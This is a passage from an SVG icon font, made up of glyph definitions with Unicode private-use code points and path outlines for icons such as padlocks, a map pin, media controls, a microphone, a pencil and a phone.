d="M333 -71q-48 0 -69 62l-51 151l-151 50q-59 19 -62 67q-3 46 54 72l474 222q33 15 58.5 10t39.5 -26q20 -33 -2 -80l-221 -474q-25 -54 -70 -54zM109 265l170 -57l57 -171l199 427z" />
    <glyph glyph-name="glyph158" unicode="&#xe09e;" horiz-adv-x="552" 
d="M262 4l-57 171l-171 57q-22 7 -30 18t-1.5 23t27.5 21l474 221q32 14 43.5 2.5t-2.5 -43.5l-222 -474q-9 -21 -20.5 -27.5t-22.5 1.5t-18 30z" />
    <glyph glyph-name="glyph159" unicode="&#xe09f;" horiz-adv-x="667" 
d="M333 592q-103 0 -177 -72q-73 -71 -73 -173q0 -101 73 -172l177 -175l178 175q72 70 72 172q0 103 -72 173q-74 72 -178 72zM333 675q139 0 236 -96t97 -232t-97 -232l-236 -232l-235 232q-98 96 -98 232t98 232t235 96zM333 446q-42 0 -73 -31t-31 -73.5t31 -73.5
q30 -30 73 -30q44 0 74 30q31 31 31 73.5t-31 73.5t-74 31zM333 488q60 0 103 -43t43 -103t-43 -103t-103 -43t-103 43t-43 103t43 103t103 43z" />
    <glyph glyph-name="glyph160" unicode="&#xe0a0;" horiz-adv-x="667" 
d="M569 579q97 -96 97 -232t-97 -232l-236 -232l-235 232q-98 96 -98 232t98 232t236 96t235 -96zM333 238q44 0 74 30q31 31 31 73.5t-31 73.5t-74 31q-42 0 -73 -31t-31 -73.5t31 -73.5q30 -30 73 -30z" />
    <glyph glyph-name="glyph161" unicode="&#xe0a1;" horiz-adv-x="583" 
d="M238 92q0 54 54 54t54 -54t-54 -54t-54 54zM292 633q68 0 117 -49t49 -117v-84h42q34 0 58.5 -24.5t24.5 -58.5v-292q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5v292q0 34 24 58.5t59 24.5h42v84q0 48 23.5 85.5t59.5 58.5q38 22 84 22zM292 550
q-35 0 -59.5 -24.5t-24.5 -58.5v-125h167v125q0 35 -24.5 59t-58.5 24zM500 8v292h-417v-292h417z" />
    <glyph glyph-name="glyph162" unicode="&#xe0a2;" horiz-adv-x="583" 
d="M500 383q34 0 58.5 -24.5t24.5 -58.5v-292q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5v292q0 34 24 58.5t59 24.5h42v84q0 69 49 117.5t118 48.5t117.5 -48.5t48.5 -117.5v-84h42zM292 38q22 0 38 16t16 38t-16 38t-38 16t-38 -16t-16 -38t16 -38
t38 -16zM375 342v125q0 35 -24.5 59t-58.5 24q-35 0 -59.5 -24.5t-24.5 -58.5v-125h167z" />
    <glyph glyph-name="glyph163" unicode="&#xe0a3;" horiz-adv-x="708" 
d="M238 92q0 54 54 54t54 -54t-54 -54t-54 54zM0 300q0 34 24 58.5t59 24.5h125v-41h167v125q0 55 28.5 94.5t73.5 58.5q30 13 65 13q68 0 117 -49t49 -117v-125q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v125q0 35 -24.5 59t-58.5 24q-35 0 -59.5 -24.5
t-24.5 -58.5v-84h42q34 0 58.5 -24.5t24.5 -58.5v-292q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5v292zM500 8v292h-417v-292h417z" />
    <glyph glyph-name="glyph164" unicode="&#xe0a4;" horiz-adv-x="708" 
d="M542 633q69 0 117.5 -48.5t48.5 -117.5v-125q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v125q0 35 -24.5 59t-58.5 24q-35 0 -59.5 -24.5t-24.5 -58.5v-84h42q34 0 58.5 -24.5t24.5 -58.5v-292q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5v292
q0 34 24 58.5t59 24.5h125v-41h167v125q0 69 49 117.5t118 48.5zM292 38q22 0 38 16t16 38t-16 38t-38 16t-38 -16t-16 -38t16 -38t38 -16z" />
    <glyph glyph-name="glyph165" unicode="&#xe0a5;" 
d="M667 508q35 0 59 -24t24 -59v-375q0 -34 -24 -58.5t-59 -24.5h-584q-35 0 -59 24.5t-24 58.5v375q0 35 24 59t59 24h584zM330 145l-65 57l-152 -152h524l-152 152l-65 -57q-19 -16 -45 -16t-45 16zM83 79l150 151l-150 131v-282zM517 230l150 -150v281zM667 425h-584v-9
l274 -240q7 -6 18 -6t18 6l274 240v9z" />
    <glyph glyph-name="glyph166" unicode="&#xe0a6;" horiz-adv-x="667" 
d="M42 -33q-18 0 -30 12.5t-12 28.5v417q0 17 12 29l188 188q11 11 27 12t28 -9l179 -143l162 161q20 20 45.5 8t25.5 -38v-416q0 -17 -13 -30l-187 -187q-11 -11 -27.5 -12t-28.5 9l-179 143l-161 -161q-12 -12 -29 -12zM83 109q122 120 125 122v302l-125 -125v-299z
M255 228l162 -129v311l-167 132v-311zM583 234v299q-122 -121 -125 -123v-301z" />
    <glyph glyph-name="glyph167" unicode="&#xe0a7;" horiz-adv-x="583" 
d="M458 -75h-333q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h333q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM125 92q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h333q17 0 29.5 12.5t12.5 29.5t-12.5 29.5t-29.5 12.5h-333zM292 514l-205 -211
l-4 -3h417q-34 36 -104 107t-104 107zM292 633q161 -165 268 -275q23 -23 23 -58q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5t24 58z" />
    <glyph glyph-name="glyph168" unicode="&#xe0a8;" horiz-adv-x="583" 
d="M500 133q34 0 58.5 -24.5t24.5 -58.5t-24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5t24 58.5t59 24.5h417zM560 358q23 -23 23 -58q0 -34 -24.5 -58.5t-58.5 -24.5h-417q-35 0 -59 24.5t-24 58.5t24 58l268 275q161 -165 268 -275z" />
    <glyph glyph-name="glyph169" unicode="&#xe0a9;" 
d="M458 438v-335l173 168zM450 533q29 0 52 -21l248 -241q-149 -145 -248 -241q-22 -22 -52 -22q-31 0 -53 22t-22 53v375q0 31 22 53t53 22zM83 438v-335l173 168zM75 533q29 0 52 -21l248 -241q-149 -145 -248 -241q-22 -22 -52 -22q-31 0 -53 22t-22 53v375q0 31 22 53
t53 22z" />
    <glyph glyph-name="glyph170" unicode="&#xe0aa;" 
d="M502 512l248 -241q-149 -145 -248 -241q-22 -22 -52 -22q-31 0 -53 22t-22 53v375q0 31 22 53t53 22q29 0 52 -21zM127 512l248 -241q-149 -145 -248 -241q-22 -22 -52 -22q-31 0 -53 22t-22 53v375q0 31 22 53t53 22q29 0 52 -21z" />
    <glyph glyph-name="glyph171" unicode="&#xe0ab;" horiz-adv-x="542" 
d="M125 -33q-52 0 -88.5 36.5t-36.5 88.5v375q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-375q0 -52 -36.5 -88.5t-88.5 -36.5zM125 508q-17 0 -29.5 -12t-12.5 -29v-375q0 -17 12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5v375q0 17 -12.5 29t-29.5 12zM417 -33
q-52 0 -88.5 36.5t-36.5 88.5v375q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-375q0 -52 -36.5 -88.5t-88.5 -36.5zM417 508q-17 0 -29.5 -12t-12.5 -29v-375q0 -17 12.5 -29.5t29.5 -12.5t29 12.5t12 29.5v375q0 17 -12 29t-29 12z" />
    <glyph glyph-name="glyph172" unicode="&#xe0ac;" horiz-adv-x="458" 
d="M83 550q35 0 59.5 -24.5t24.5 -58.5v-334q0 -34 -24.5 -58.5t-59.5 -24.5t-59 24t-24 59v334q0 35 24 59t59 24zM375 550q35 0 59 -24t24 -59v-334q0 -35 -24 -59t-59 -24t-59 24t-24 59v334q0 35 24 59t59 24z" />
    <glyph glyph-name="glyph173" unicode="&#xe0ad;" horiz-adv-x="417" 
d="M83 508v-416q35 35 106.5 104t107.5 104l-210 205zM83 592q35 0 59 -24l275 -268q-166 -161 -276 -268q-24 -24 -58 -24t-58.5 24.5t-24.5 59.5v416q0 35 24.5 59.5t58.5 24.5z" />
    <glyph glyph-name="glyph174" unicode="&#xe0ae;" horiz-adv-x="417" 
d="M333 508l-212 -208l212 -208v416zM275 567q25 25 58 25q35 0 59.5 -25t24.5 -59v-416q0 -34 -24.5 -59t-59.5 -25q-33 0 -58 25l-275 267q167 163 275 267z" />
    <glyph glyph-name="glyph175" unicode="&#xe0af;" horiz-adv-x="417" 
d="M333 8q-33 0 -58 25l-275 267q167 163 275 267q25 25 58 25q35 0 59.5 -25t24.5 -59v-416q0 -34 -24.5 -59t-59.5 -25z" />
    <glyph glyph-name="glyph176" unicode="&#xe0b0;" horiz-adv-x="417" 
d="M142 32q-24 -24 -59 -24q-34 0 -58.5 24.5t-24.5 59.5v416q0 35 24.5 59.5t58.5 24.5q35 0 59 -24l275 -268q-165 -161 -275 -268z" />
    <glyph glyph-name="glyph177" unicode="&#xe0b1;" horiz-adv-x="500" 
d="M250 467q-69 0 -118 -49t-49 -118t49 -118t118 -49t118 49t49 118t-49 118t-118 49zM250 550q104 0 177 -73t73 -177t-73 -177t-177 -73t-177 73t-73 177t73 177t177 73z" />
    <glyph glyph-name="glyph178" unicode="&#xe0b2;" horiz-adv-x="500" 
d="M250 550q104 0 177 -73t73 -177t-73 -177t-177 -73t-177 73t-73 177t73 177t177 73z" />
    <glyph glyph-name="glyph179" unicode="&#xe0b3;" 
d="M292 438l-173 -167l173 -168v335zM300 533q31 0 53 -22t22 -53v-375q0 -31 -22 -53t-53 -22q-28 0 -52 22l-248 241q149 145 248 241q21 21 52 21zM667 438l-173 -167l173 -168v335zM675 533q31 0 53 -22t22 -53v-375q0 -31 -22 -53t-53 -22q-28 0 -52 22l-248 241
q149 145 248 241q21 21 52 21z" />
    <glyph glyph-name="glyph180" unicode="&#xe0b4;" 
d="M300 533q31 0 53 -22t22 -53v-375q0 -31 -22 -53t-53 -22q-28 0 -52 22l-248 241q149 145 248 241q21 21 52 21zM675 533q31 0 53 -22t22 -53v-375q0 -31 -22 -53t-53 -22q-28 0 -52 22l-248 241q149 145 248 241q21 21 52 21z" />
    <glyph glyph-name="glyph181" unicode="&#xe0b5;" horiz-adv-x="500" 
d="M417 467h-334v-334h334v334zM417 550q35 0 59 -24t24 -59v-334q0 -35 -24 -59t-59 -24h-334q-35 0 -59 24t-24 59v334q0 35 24 59t59 24h334z" />
    <glyph glyph-name="glyph182" unicode="&#xe0b6;" horiz-adv-x="500" 
d="M417 550q35 0 59 -24t24 -59v-334q0 -35 -24 -59t-59 -24h-334q-35 0 -59 24t-24 59v334q0 35 24 59t59 24h334z" />
    <glyph glyph-name="glyph183" unicode="&#xe0b7;" horiz-adv-x="792" 
d="M667 550q52 0 88.5 -36.5t36.5 -88.5v-292q0 -52 -36.5 -88.5t-88.5 -36.5h-375l-125 -125v125h-42q-52 0 -88.5 36.5t-36.5 88.5v292q0 52 36.5 88.5t88.5 36.5h542zM708 133v292q0 17 -12 29.5t-29 12.5h-542q-17 0 -29.5 -12.5t-12.5 -29.5v-292q0 -17 12.5 -29
t29.5 -12h542q17 0 29 12t12 29zM208 196q-34 0 -58.5 24t-24.5 59t24.5 59t58.5 24q35 0 59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5zM208 321q-17 0 -29 -12.5t-12 -29.5t12 -29t29 -12t29.5 12t12.5 29t-12.5 29.5t-29.5 12.5zM396 196q-35 0 -59.5 24.5t-24.5 58.5
t24.5 58.5t59.5 24.5q34 0 58.5 -24t24.5 -59t-24.5 -59t-58.5 -24zM396 321q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12t29.5 12t12.5 29t-12.5 29.5t-29.5 12.5zM583 196q-35 0 -59 24t-24 59t24 59t59 24t59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5zM583 321
q-17 0 -29 -12.5t-12 -29.5t12 -29t29 -12t29.5 12t12.5 29t-12.5 29.5t-29.5 12.5z" />
    <glyph glyph-name="glyph184" unicode="&#xe0b8;" 
d="M625 508h-500q-17 0 -29.5 -12t-12.5 -29v-292q0 -17 12.5 -29.5t29.5 -12.5h125v-7l7 7h368q17 0 29.5 12.5t12.5 29.5v292q0 17 -12.5 29t-29.5 12zM625 592q52 0 88.5 -36.5t36.5 -88.5v-292q0 -52 -36.5 -88.5t-88.5 -36.5h-333l-125 -125v125h-42q-52 0 -88.5 36.5
t-36.5 88.5v292q0 52 36.5 88.5t88.5 36.5h500z" />
    <glyph glyph-name="glyph185" unicode="&#xe0b9;" horiz-adv-x="1000" 
d="M875 508q52 0 88.5 -36.5t36.5 -88.5v-291q0 -52 -36.5 -88.5t-88.5 -36.5h-42v-125l-125 125h-333q-52 0 -88.5 36.5t-36.5 88.5l-125 -125v125q-52 0 -88.5 36.5t-36.5 88.5v291q0 52 36.5 88.5t88.5 36.5h500q52 0 88.5 -36.5t36.5 -88.5h125zM125 175h167v187
q0 43 30.5 74t73.5 31h271v41q0 17 -12.5 29.5t-29.5 12.5h-500q-17 0 -29.5 -12.5t-12.5 -29.5v-291q0 -17 12.5 -29.5t29.5 -12.5zM917 92v291q0 17 -12.5 29.5t-29.5 12.5h-479q-26 0 -44.5 -18.5t-18.5 -44.5v-270q0 -17 12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5
t12.5 29.5z" />
    <glyph glyph-name="glyph186" unicode="&#xe0ba;" horiz-adv-x="583" 
d="M292 133q-69 0 -118 49t-49 118v250q0 69 49 118t118 49t117.5 -49t48.5 -118v-250q0 -69 -48.5 -118t-117.5 -49zM292 633q-35 0 -59.5 -24.5t-24.5 -58.5v-250q0 -34 24.5 -58.5t59.5 -24.5q34 0 58.5 24.5t24.5 58.5v250q0 34 -24.5 58.5t-58.5 24.5zM583 300
q0 -109 -71.5 -191t-178.5 -97v-45h125q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-333q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h125v45q-107 15 -178.5 97t-71.5 191v83q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-83q0 -86 61.5 -147t147.5 -61
t147 61t61 147v83q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-83z" />
    <glyph glyph-name="glyph187" unicode="&#xe0bb;" horiz-adv-x="583" 
d="M292 133q-69 0 -118 49t-49 118v250q0 69 49 118t118 49t117.5 -49t48.5 -118v-250q0 -69 -48.5 -118t-117.5 -49zM583 300q0 -109 -71.5 -191t-178.5 -97v-45h125q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-333q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5
t29.5 12.5h125v45q-107 15 -178.5 97t-71.5 191v83q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-83q0 -86 61.5 -147t147.5 -61t147 61t61 147v83q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-83z" />
    <glyph glyph-name="glyph188" unicode="&#xe0bc;" 
d="M625 133h-500q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h500q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM125 300q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12h500q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5h-500z" />
    <glyph glyph-name="glyph189" unicode="&#xe0bd;" horiz-adv-x="667" 
d="M583 342q35 0 59.5 -25t24.5 -59t-24.5 -58.5t-59.5 -24.5h-500q-35 0 -59 24.5t-24 58.5q0 35 24.5 59.5t58.5 24.5h500z" />
    <glyph glyph-name="glyph190" unicode="&#xe0be;" horiz-adv-x="833" 
d="M771 471q55 -25 62 -79q0 -66 -54 -96l-46 -25q17 -67 17 -113q0 -88 -94 -148t-231 -60q-172 0 -267 88q-3 -1 -8.5 -2t-23.5 -3.5t-34 0.5q-32 3 -62 36.5t-30 76.5q0 87 12 137l13 63q-8 17 -8 50q0 24 18 47t44 36q225 113 279 138q42 21 65.5 20.5t59.5 -20.5z
M429 38q102 0 172 36.5t70 87.5l-17 117l-179 -87q-49 -20 -92 0l-175 87l-20 -117q0 -53 70 -88.5t171 -35.5zM733 375q13 6 13 14.5t-13 14.5q-262 134 -279 142q-27 13 -54 0l-279 -142q-13 -6 -13 -14.5t13 -14.5l8 -4q-13 -33 -25 -92q-12 -62 -12 -129q0 -15 10 -24
t23 -9h4q29 0 29 33q0 6 -4 46.5t-4 74.5q0 52 12 83l238 -121q29 -14 58 0z" />
    <glyph glyph-name="glyph191" unicode="&#xe0bf;" horiz-adv-x="917" 
d="M833 633q35 0 59.5 -24.5t24.5 -58.5v-500q0 -34 -24.5 -58.5t-59.5 -24.5h-750q-35 0 -59 24.5t-24 58.5v500q0 34 24 58.5t59 24.5h750zM83 550v-500h334v500h-334zM833 50v500h-375v-500h375zM792 238v-126q0 -8 -6.5 -14t-14.5 -6h-42q-8 0 -14.5 6t-6.5 14v126
q0 8 6.5 14t14.5 6h42q8 0 14.5 -6t6.5 -14zM667 488v-209q0 -8 -6.5 -14.5t-14.5 -6.5h-125q-8 0 -14.5 6.5t-6.5 14.5v209q0 8 6.5 14t14.5 6h125q8 0 14.5 -6t6.5 -14zM729 383q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h42q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5
t-14.5 -6.5h-42zM729 300q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h42q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-42zM521 175q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h125q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-125zM646 133q8 0 14.5 -6.5
t6.5 -14.5t-6.5 -14t-14.5 -6h-125q-8 0 -14.5 6t-6.5 14t6.5 14.5t14.5 6.5h125zM729 467q-8 0 -14.5 6.5t-6.5 14.5t6.5 14t14.5 6h42q8 0 14.5 -6t6.5 -14t-6.5 -14.5t-14.5 -6.5h-42zM375 488v-126q0 -8 -6.5 -14t-14.5 -6h-208q-8 0 -14.5 6t-6.5 14v126q0 8 6.5 14
t14.5 6h208q8 0 14.5 -6t6.5 -14zM354 217q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-208q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h208zM354 300q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-208q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h208zM354 133
q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14t-14.5 -6h-208q-8 0 -14.5 6t-6.5 14t6.5 14.5t14.5 6.5h208z" />
    <glyph glyph-name="glyph192" unicode="&#xe0c0;" horiz-adv-x="667" 
d="M583 639q34 0 59 -24.5t25 -58.5v-423q0 -69 -55.5 -117.5t-132.5 -48.5q-74 0 -127 45q-24 -40 -68 -63.5t-96 -23.5q-77 0 -132.5 49t-55.5 118q0 53 35 96.5t90 60.5v254q0 32 21 55.5t52 27.5l375 52zM333 133q0 47 35.5 82t89.5 42v72l-125 -18v-178zM583 133v423
l-375 -53v-330q-14 2 -20 2q-44 0 -74.5 -24.5t-30.5 -58.5q0 -35 31 -59.5t74 -24.5t73.5 24.5t30.5 59.5v255l208 31v-163q-14 2 -21 2q-43 0 -73.5 -24.5t-30.5 -59.5t30.5 -59t73.5 -24t73.5 24t30.5 59z" />
    <glyph glyph-name="glyph193" unicode="&#xe0c1;" horiz-adv-x="625" 
d="M602 636q9 1 16 -5.5t7 -15.5v-503q0 -43 -36.5 -73.5t-88.5 -30.5t-88.5 30.5t-36.5 73.5t36.5 74t88.5 31v155l-250 -26v-317q0 -43 -36.5 -73.5t-88.5 -30.5t-88.5 30.5t-36.5 73.5t36.5 73.5t88.5 30.5v430q0 8 5.5 14t12.5 7z" />
    <glyph glyph-name="glyph194" unicode="&#xe0c2;" horiz-adv-x="793" 
d="M604 689q77 0 133 -56t56 -133q0 -22 -7 -50q20 -62 -25 -107l-187 -188q-30 -30 -74 -30h-3l-90 -90q-25 -25 -63 -40q-10 -4 -289 -97q-8 -2 -13 -2q-21 0 -34 17t-6 37q93 279 97 289q15 38 41 64q331 330 332 331q57 55 132 55zM299 67l-127 127q-2 -6 -12 -35
t-17 -50l71 -71q35 11 85 29zM128 65l-21 -62l63 21zM449 195q-12 18 -10.5 40t17.5 38l154 154l-114 114l-297 -298l-8 -9l147 -147l10 7zM702 402q14 14 -0.5 28.5t-28.5 0.5l-188 -187q-10 -10 -4 -23t19 -13q9 0 15 6zM639 456q31 31 68 19q3 12 3 25q0 43 -31 74
q-33 31 -77.5 29.5t-76.5 -33.5z" />
    <glyph glyph-name="glyph195" unicode="&#xe0c3;" horiz-adv-x="768" 
d="M750 513q18 -18 18 -44t-18 -44l-456 -456q-17 -17 -47.5 -30.5t-58.5 -13.5h-188v187q0 28 13.5 59t30.5 48l456 456q18 18 44 18t44 -18zM115 172l52 -51l345 346l-51 51zM188 8q11 0 26 7q-8 8 -21 20.5t-40 40t-45 44.5l-18 18q-7 -17 -7 -26v-62l42 -42h63zM247 40
l346 346l-51 51l-346 -345zM622 415l54 54l-132 132l-54 -53z" />
    <glyph glyph-name="glyph196" unicode="&#xe0c4;" horiz-adv-x="836" 
d="M771 647q25 -25 42 -59.5t21.5 -87t-9.5 -109.5t-59.5 -131t-119.5 -148q-189 -189 -363 -189q-107 0 -172 65l-74 74q-37 37 -37 88.5t37 88.5l66 66q37 37 88 37t88 -37l58 -57l174 173l-58 58q-37 37 -37 88.5t37 88.5l66 66q36 36 89 36q52 0 88 -36zM512 597
q-12 -12 -12 -29.5t12 -29.5l45 -45l125 125l-45 45q-12 12 -29 12q-18 0 -30 -12zM95 121l46 -45l125 125l-46 45q-12 12 -29 12t-29 -12l-67 -66q-12 -12 -12 -29.5t12 -29.5zM587 171q65 65 104 127t51 106.5t9 84t-13.5 62t-25.5 37.5l-125 -125l12 -12q12 -12 12 -29.5
t-12 -29.5l-233 -233q-12 -12 -29 -12q-18 0 -30 12l-12 13l-125 -126q40 -40 113 -40q139 0 304 165z" />
    <glyph glyph-name="glyph197" unicode="&#xe0c5;" horiz-adv-x="710" 
d="M453 505l-18 18q-18 18 -18 44t18 44l66 67q18 18 44 18t44 -18l19 -19zM173 261l18 -18l-154 -155l-19 18q-18 18 -18 45q0 26 18 44l66 66q18 18 44.5 18t44.5 -18zM664 603q8 -8 18 -22t21 -56.5t5 -90.5t-48 -123t-121 -154q-171 -171 -319 -171q-81 0 -127 46
l-15 14l155 155l27 -27q14 -14 29 0l233 233q6 6 6 14q0 9 -6 15l-27 27l154 155z" />
    <glyph glyph-name="glyph198" unicode="&#xe0c6;" 
d="M625 540q51 0 88 -37t37 -88q0 -52 -37 -89q-38 -39 -88 -61v-173q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5v198q-51 0 -88 37t-37 88t37 88q89 89 213 89t213 -89q15 -15 37 -15t37 15q37 37 88 37z
M654 385q12 12 12 29.5t-12 29.5q-13 13 -29 13t-29 -13q-39 -39 -96 -39t-96 39q-64 64 -154 64t-154 -64q-12 -12 -12 -29.5t12 -29.5t29 -12t29 12q24 24 54 33v-326q0 -17 12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5v326q30 -9 54 -33q46 -46 112 -59v-234
q0 -17 12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5v234q66 13 112 59z" />
    <glyph glyph-name="glyph199" unicode="&#xe0c7;" horiz-adv-x="583" 
d="M571 444q12 -12 12 -29.5t-12 -29.5q-46 -46 -113 -59v-234q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v234q-67 13 -113 59q-24 24 -54 33v-326q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v326q-30 -9 -54 -33q-12 -12 -29.5 -12t-29.5 12t-12 29.5
t12 29.5q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40q12 12 29.5 12t29.5 -12z" />
    <glyph glyph-name="glyph200" unicode="&#xe0c8;" horiz-adv-x="709" 
d="M685 484q24 -24 24 -58.5t-24 -59.5q-13 -13 -29 -19q-85 -41 -115 -100q-41 -82 -41 -197q0 -36 -23.5 -59.5t-59.5 -23.5q-38 0 -60 24l-134 135l-223 -159l159 223l-135 134q-16 15 -21.5 39.5t3.5 51.5q22 52 77 52q117 0 197 40l9 5q55 30 94 113q6 16 17 27
q24 24 59.5 23.5t58.5 -24.5zM466 284q43 86 157 140l-164 169q-55 -117 -141 -160l-10 -5q-96 -45 -225 -45l333 -333q0 134 50 234z" />
    <glyph glyph-name="glyph201" unicode="&#xe0c9;" horiz-adv-x="668" 
d="M458 50q0 -18 -11.5 -30t-29.5 -12q-17 0 -30 13l-135 135l-252 -189l189 252l-135 135q-19 19 -9 45q11 26 38 26q126 0 216 45q72 36 121 137q7 19 29 25.5t40 -10.5l166 -167q17 -18 11 -40t-25 -29q-102 -50 -138 -121q-45 -88 -45 -215z" />
    <glyph glyph-name="glyph202" unicode="&#xe0ca;" horiz-adv-x="766" 
d="M718 627q47 -47 47.5 -122.5t-50.5 -116.5q-42 -33 -152 -74l67 -67q12 -12 12 -29.5t-12 -29.5t-29 -12q-18 0 -30 12l-12 12l-218 -218q-25 -25 -63 -40q-1 -1 -23.5 -8.5t-62 -16t-72.5 -8.5q-62 0 -91 29q-19 19 -25.5 51.5t-3 64.5t11.5 63.5t13.5 48.5t7.5 20
q15 38 41 64l218 218l-13 12q-12 12 -12 29.5t12 29.5t29.5 12t29.5 -12l68 -68q42 112 73 152q41 52 118 52q73 0 121 -48zM88 -3q19 -16 108 6l-101 101q-22 -89 -7 -107zM241 17q27 10 41 24l218 218l-149 149l-218 -218q-14 -14 -24 -40z" />
    <glyph glyph-name="glyph203" unicode="&#xe0cb;" horiz-adv-x="833" 
d="M770 284q41 -23 57 -68.5t-3 -89.5q-19 -43 -61.5 -63.5t-88.5 -7.5l-112 32v-35l37 -29q37 -30 45 -77.5t-18 -87.5q-26 -41 -72 -54t-89 9l-48 8q-12 0 -24.5 -2t-18.5 -4l-6 -2q-43 -22 -89 -9t-72 54q-26 40 -18 87.5t45 77.5l37 29v35l-112 -32q-46 -13 -88 7.5
t-61 63.5t-3.5 89t56.5 69l208 118v200q0 60 43 103t103 43t102.5 -43t42.5 -103v-200zM747 159q6 14 1 29t-19 23l-250 143v248q0 26 -18.5 44.5t-43.5 18.5t-44 -18.5t-19 -44.5v-248l-250 -143q-13 -7 -18 -22.5t1 -29.5t20 -21t29 -3l218 62v-185l-68 -54
q-13 -10 -15 -26.5t6 -29.5t24 -17t30 3q35 16 86 16q23 0 44 -4t31 -8l10 -4q14 -8 30 -3.5t24 17.5t6 29.5t-15 26.5l-68 54v185l218 -62q15 -4 29.5 3t20.5 21zM396 612q0 21 21 21q20 0 20 -21q0 -20 -20 -20q-21 0 -21 20z" />
    <glyph glyph-name="glyph204" unicode="&#xe0cc;" horiz-adv-x="667" 
d="M646 237q28 -16 19 -47t-40 -31l-11 2l-218 62v-185l68 -54q23 -20 12.5 -47.5t-38.5 -27.5q-8 0 -16 3l-89 36l-88 -36q-14 -6 -29 -1t-23 19q-8 13 -5 28.5t15 25.5l68 54v185l-218 -62q-15 -4 -29.5 3t-20.5 21t-1 29t19 23l250 143v248q0 26 18.5 44.5t43.5 18.5
t44 -18.5t19 -44.5v-248zM333 618q9 0 15 6t6 15q0 20 -21 20q-20 0 -20 -20q0 -21 20 -21z" />
    <glyph glyph-name="glyph205" unicode="&#xe0cd;" horiz-adv-x="583" 
d="M542 550q19 0 30 -11.5t11 -30.5v-175q-9 -78 -53 -139.5t-113 -93.5v-133q0 -35 -24.5 -59.5t-59.5 -24.5h-83q-34 0 -58.5 24.5t-24.5 59.5v133q-70 32 -115.5 94t-51.5 139v175q0 19 11.5 30.5t30.5 11.5h41v125q0 19 11.5 30.5t30.5 11.5h83q19 0 30.5 -11.5
t11.5 -30.5v-125h83v125q0 19 11.5 30.5t30.5 11.5h83q19 0 30.5 -11.5t11.5 -30.5v-125h42zM375 675v-125h83v125h-83zM125 675v-125h83v125h-83zM333 -33v83h-83v-83h83zM292 154q68 0 123 41t77 105h-396q19 -63 73.5 -104.5t122.5 -41.5zM500 362v105h-417v-105
q0 -10 5 -20h408q4 8 4 20z" />
    <glyph glyph-name="glyph206" unicode="&#xe0ce;" 
d="M375 -75q-52 0 -88.5 36.5t-36.5 88.5l2 127l-126 -2q-52 0 -89 36.5t-37 88.5t36.5 88.5t88.5 36.5l127 2l-2 122q0 52 36.5 89t88.5 37t88.5 -36.5t36.5 -88.5l2 -123l124 -2q51 0 87.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5l-123 2l-2 -128q0 -51 -36.5 -87.5
t-88.5 -36.5zM333 258v-209q0 -17 12.5 -29t29.5 -12t29.5 12.5t12.5 29.5v208h209q17 0 29 12.5t12 29.5t-12.5 29.5t-29.5 12.5h-208v208q0 18 -12.5 30t-29.5 12t-29.5 -12.5t-12.5 -29.5v-208h-208q-18 0 -30 -12.5t-12 -29.5t12.5 -29.5t29.5 -12.5h208z" />
    <glyph glyph-name="glyph207" unicode="&#xe0cf;" horiz-adv-x="667" 
